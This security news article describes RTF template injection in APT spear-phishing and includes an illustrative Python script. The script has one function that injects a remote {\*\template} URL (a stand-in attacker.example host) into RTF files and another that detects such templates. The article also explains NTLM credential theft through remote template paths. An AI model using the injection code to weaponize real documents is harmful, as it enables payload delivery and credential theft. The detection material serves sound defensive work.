    Hackers using Malicious RTF Injection Technique in Phishing Attacks


    In Q2 and Q3 of 2021, APT threat actors increasingly adopted a novel and easily implemented phishing attachment technique called RTF template injection.

    The technique abuses the template functionality of RTF files. So far it has been used mainly by state-sponsored APT actors from China, Russia and India (listed below).

    Financially motivated threat actors are expected to follow the APTs in adopting this stealthy technique. APTs favor it because of its simplicity and its effectiveness in retrieving malicious content or payloads from a remote URL.

    The first weaponized RTF template injection was observed in March 2021, and since then the operators of the technique have developed it considerably.

    A simple way to fetch payloads

    RTF is a document format created by Microsoft that can be opened on all major operating systems with common applications and browsers. An RTF template defines how the document contents should be presented and formatted.

    RTF templates are normally local file resources. The attackers abuse this legitimate functionality by pointing the template at a URL instead of a local file, so the document fetches remote content when it is opened.

    Exploiting this legitimate functionality allows the attackers to:-

    • Load malicious payloads into an application such as Microsoft Word.
    • Perform NTLM authentication against a remote URL, which can be used to steal Windows credentials.

    Using a hex editor (or any text editor, since RTF is plain text), anyone can create a remote RTF template simply by adding a {\*\template URL} control word to an RTF file. Notably, the technique applies to any Office file that is opened as RTF, and Word documents in particular.
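    The following Python script is an added example, not code from the original article or from Proofpoint. It shows both sides of the technique described above: how trivially a {\*\template URL} destination can be injected into an otherwise benign RTF file, and a detector a defender can run over mail attachments to flag templates that point at a remote URL or UNC path rather than a local file. The RTF sample, the host names and the file names are constructed for illustration only; the decoder also handles the \'hh hex and \uN? Unicode escapes that can be used to obscure the URL, which is an assumption about evasion rather than a claim about any specific campaign.

```python
import re

# Constructed sample: a minimal RTF document with an injected remote template.
# The URL and file names are illustrative, not taken from any real campaign.
SAMPLE_RTF = (
    r"{\rtf1\ansi\deff0"
    r"{\fonttbl{\f0 Calibri;}}"
    r"{\*\template http://attacker.example/tpl.dotm}"
    r"\pard Quarterly report attached.\par"
    r"}"
)

# Matches the {\*\template ...} destination group and captures its contents.
TEMPLATE_RE = re.compile(r"\{\\\*\\template\s*([^}]*)\}", re.IGNORECASE | re.DOTALL)

# A template target is "remote" if it is an http/https/ftp URL or a UNC path
# (a UNC path will trigger NTLM authentication against the remote host).
REMOTE_RE = re.compile(r"^(?:https?://|ftp://|\\\\)", re.IGNORECASE)


def inject_template(rtf: str, url: str) -> str:
    """Insert a {\\*\\template URL} group right after the RTF header control words.

    This is the attacker's side of the technique: one control word added to a
    plain-text file is enough to make Word fetch a remote template on open.
    """
    header = re.match(r"\{\\rtf1[^{}]*", rtf)
    if not header:
        raise ValueError("not an RTF document")
    end = header.end()
    return rtf[:end] + "{\\*\\template " + url + "}" + rtf[end:]


def _decode_escapes(s: str) -> str:
    """Resolve RTF escapes that can hide a URL from naive string matching."""
    # \'hh  -> byte given as two hex digits
    s = re.sub(r"\\'([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)
    # \uN?  -> 16-bit code point N (signed), followed by a one-char substitute
    s = re.sub(r"\\u(-?\d+) ?.?", lambda m: chr(int(m.group(1)) & 0xFFFF), s)
    # \\    -> literal backslash (used when a UNC path is written into RTF)
    return s.replace("\\\\", "\\")


def find_remote_templates(rtf: str) -> list:
    """Return every template destination in `rtf` that points at a remote resource.

    This is the defender's side: an empty list means no remote template was
    found; anything returned is worth blocking or detonating in a sandbox.
    """
    hits = []
    for m in TEMPLATE_RE.finditer(rtf):
        target = _decode_escapes(m.group(1)).strip().strip('"')
        if REMOTE_RE.match(target):
            hits.append(target)
    return hits


if __name__ == "__main__":
    print("sample:", find_remote_templates(SAMPLE_RTF))
    clean = r"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}\pard Hello\par}"
    print("clean :", find_remote_templates(clean))
    print("armed :", find_remote_templates(inject_template(clean, "https://x.example/t.dotm")))
```

    A local template such as C:\Templates\Normal.dotm is not flagged, because the control word itself is legitimate; only the remote destination is the indicator. A real mail-gateway rule should scan the whole attachment regardless of its extension, since Word will open RTF content from a file named .doc.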

    The attackers deliver these documents to victims in spear-phishing emails; once a victim opens the document, the remote template is fetched and the malicious operation begins.

    APT Groups Exploiting This Technique

    Below are the primary APT groups known to exploit this technique:-

    • TA423 from China
    • Gamaredon from Russia
    • DoNoT from India

    Among these groups, the first to use the technique was DoNoT from India, followed by TA423 from China, and most recently Gamaredon from Russia.

    Here is what the security analysts at Proofpoint said:-

    “While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape.”

    The rapid increase in adoption indicates how other APT groups, financially motivated criminals, botnet operators and ransomware groups may abuse this technique in the coming months.
